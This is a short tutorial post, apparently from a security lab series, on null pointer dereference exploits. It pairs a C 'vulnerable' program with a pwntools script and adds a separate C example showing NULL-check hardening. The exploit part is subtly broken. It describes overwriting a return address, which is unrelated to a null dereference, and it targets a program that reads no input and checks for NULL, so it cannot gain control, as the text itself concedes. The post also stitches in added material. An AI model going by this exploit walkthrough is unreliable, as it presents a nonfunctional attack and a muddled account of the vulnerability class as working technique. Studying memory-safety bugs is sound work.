strangerRidingCaml
8. Null Pointer Dereference Exploits
Null Pointer Dereference Exploits
A null pointer dereference occurs when a program attempts to access or manipulate memory through a null pointer. The result is a segmentation fault or, when exploited, attacker control over program execution.
Lab Activity: Null Pointer Dereference Exploit
In this lab activity, we'll demonstrate a simple null pointer dereference exploit on a vulnerable C program.
Defender Side Code:
#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(int *ptr) {
    if (ptr != NULL) {
        *ptr = 42; // Write to the memory location pointed to by ptr
    }
}

int main() {
    int *ptr = NULL; // Initialize pointer to NULL
    vulnerable_function(ptr); // Call vulnerable function with null pointer
    return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7 # Example address, adjust as necessary
# Payload to overwrite the return address with the address of the vulnerable function
payload = p64(vulnerable_function_addr)
# Start the vulnerable program as a local process
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
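The exploit code constructs a payload containing the address of the vulnerable function, packed as a 64-bit little-endian value with p64(). It starts the vulnerable program as a local process, sends the payload to its standard input, and is intended to gain control over program execution upon successful exploitation. Note that the program as listed reads no input and checks ptr against NULL before writing, so it exits cleanly without dereferencing the null pointer and never consumes the payload.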
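To see what the NULL check in the defender-side code buys, the following added example (not code from the original post) runs an unchecked and a checked write in a child process and reports the signal that ends it. The names write_unchecked, write_checked and fatal_signal are hypothetical, and the example assumes a Linux/POSIX system where address 0 is not mapped.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Unsafe variant: trusts the caller. volatile forces the compiler to emit
 * the store, so the faulting write really happens. */
int write_unchecked(volatile int *ptr) {
    *ptr = 42;
    return 0;
}

/* Hardened variant: rejects NULL and reports the error to the caller. */
int write_checked(volatile int *ptr) {
    if (ptr == NULL)
        return -EINVAL;
    *ptr = 42;
    return 0;
}

/* Hypothetical helper: run fn(arg) in a child process and return the signal
 * that killed it, 0 if it exited normally, or -1 if fork/waitpid failed. */
int fatal_signal(int (*fn)(volatile int *), volatile int *arg) {
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(fn(arg) == 0 ? 0 : 1); /* child: leave without flushing stdio */
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}

int main(void) {
    int value = 0;
    printf("unchecked, NULL : signal %d (SIGSEGV is %d)\n",
           fatal_signal(write_unchecked, NULL), SIGSEGV);
    printf("checked,   NULL : signal %d\n", fatal_signal(write_checked, NULL));
    printf("checked,  valid : signal %d\n", fatal_signal(write_checked, &value));
    printf("direct call with NULL returns %d\n", write_checked(NULL));
    return 0;
}
```

Compile it the same way as the lab program, for example with gcc -o null_check_demo null_check_demo.c (the file name is an assumption).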